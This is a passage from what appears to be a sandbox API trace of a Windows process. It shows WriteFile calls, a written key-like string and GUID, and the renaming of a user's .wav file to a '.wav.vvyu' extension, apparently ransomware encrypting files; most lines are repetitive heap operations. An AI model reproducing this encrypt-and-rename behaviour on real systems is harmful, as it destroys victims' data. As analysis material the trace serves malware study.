lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x126e9, lpOverlapped=0x0) returned 1 [0197.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0197.574] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x126ee, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.574] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0197.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0197.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0197.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0197.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0197.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0197.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0197.576] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0197.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0197.576] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0197.576] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0197.576] CloseHandle (hObject=0x584) returned 1 [0197.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbbc0 [0197.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x2af3f88 [0197.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbbc0 | out: hHeap=0x2c0000) returned 1 [0197.578] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\26hKDH\\dhVO\\waqplOJ2C0tw.wav" (normalized: "c:\\users\\keecfmwgj\\music\\26hkdh\\dhvo\\waqploj2c0tw.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\26hKDH\\dhVO\\waqplOJ2C0tw.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\26hkdh\\dhvo\\waqploj2c0tw.wav.vvyu")) returned 1 [0197.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0197.580] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0197.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x345758 | out: hHeap=0x2c0000) returned 1 [0197.584] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53e501f0, ftCreationTime.dwHighDateTime=0x1d8a555, ftLastAccessTime.dwLowDateTime=0xf274b0d0, ftLastAccessTime.dwHighDateTime=0x1d8a722, ftLastWriteTime.dwLowDateTime=0xf274b0d0, ftLastWriteTime.dwHighDateTime=0x1d8a722, nFileSizeHigh=0x0, nFileSizeLow=0x126ee, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="waqplOJ2C0tw.wav", cAlternateFileName="WAQPLO~1.WAV")) returned 0 [0197.584] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0197.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0197.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0197.585] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0197.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b8e8 [0197.585] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0197.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.586] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.586] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.587] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.587] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.587] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0197.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0197.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.592] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0197.592] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0197.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.595] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.596] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.598] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0197.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0197.600] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0197.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0197.602] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.602] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0197.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0197.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.605] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0197.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0197.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0197.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0197.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0197.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0197.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 